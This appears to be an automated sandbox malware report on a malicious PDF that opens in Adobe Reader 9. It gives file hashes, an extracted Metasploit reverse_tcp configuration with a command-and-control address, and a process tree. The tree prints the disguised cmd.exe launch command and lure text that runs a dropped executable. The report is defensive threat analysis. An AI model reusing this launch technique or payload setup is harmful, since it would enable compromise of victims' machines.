Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2024 04:13

General

  • Target

    1cf7562bb1a46f5157d63a0bf2f5d70ef8be189e2da761fe1298d40067973fcdN.pdf

  • Size

    117KB

  • MD5

    58958d306b7b19aa3729a58074a08250

  • SHA1

    1b29280af48c485c362a2dabcd1dcb01e09163c1

  • SHA256

    1cf7562bb1a46f5157d63a0bf2f5d70ef8be189e2da761fe1298d40067973fcd

  • SHA512

    af73a0ca7cccbb2a6313ad29481469bfdc92da0feeb8bacc22e5c0d010778c3f37565eee3ad099b03b094adc241546ab528e8ce3a8f8de85859b958d0e0b2a79

  • SSDEEP

    3072:4qc1+bQ+SWIVg5f0Ur+jltgEtlnwSOHtLnwSOT:5c1OfIarWnwSONnwSOT

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.211.154:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\1cf7562bb1a46f5157d63a0bf2f5d70ef8be189e2da761fe1298d40067973fcdN.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\template.pdf" (cd "Desktop"))&(if exist "My Documents\template.pdf" (cd "My Documents"))&(if exist "Documents\template.pdf" (cd "Documents"))&(if exist "Escritorio\template.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\template.pdf" (cd "Mis Documentos"))&(start template.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2676
      • \??\c:\Users\Admin\Documents\template.pdf
        template.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3000

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    e09ac691d4d4ec13fabc9e8f77f4faff

    SHA1

    4bf1fc4a85cd727583040e2f2978ec54771edb37

    SHA256

    4839c4cbd6b8ac4ac8efc95773635ef8aa44dad37e56d37c1984c92728a952d6

    SHA512

    23493dc48baad6910d9c6268c23fdd945fc9abb602c811ed38074314db9546149134ac40fbb50084997d4d1f19b757ceee66a2d31f7ef52457e21ed592f6dab5

  • C:\Users\Admin\Documents\template.pdf

    Filesize

    72KB

    MD5

    e79a48c8cb3578ad01fa3f0d02776fad

    SHA1

    b6e1e21f39b5ccea875096a3081c681a0a59333a

    SHA256

    f0e3b1ee49c624a162a2ada19e5d687bad5417ef9590da784d532bab32421f2b

    SHA512

    7087c39972c8da9d7cc1d242dbf7c162b32193de68a891dbd16bf4920f883d32bd60826f729ac2c6c32ca0842c622d02620736d98093e3772002d2c537ea0ca3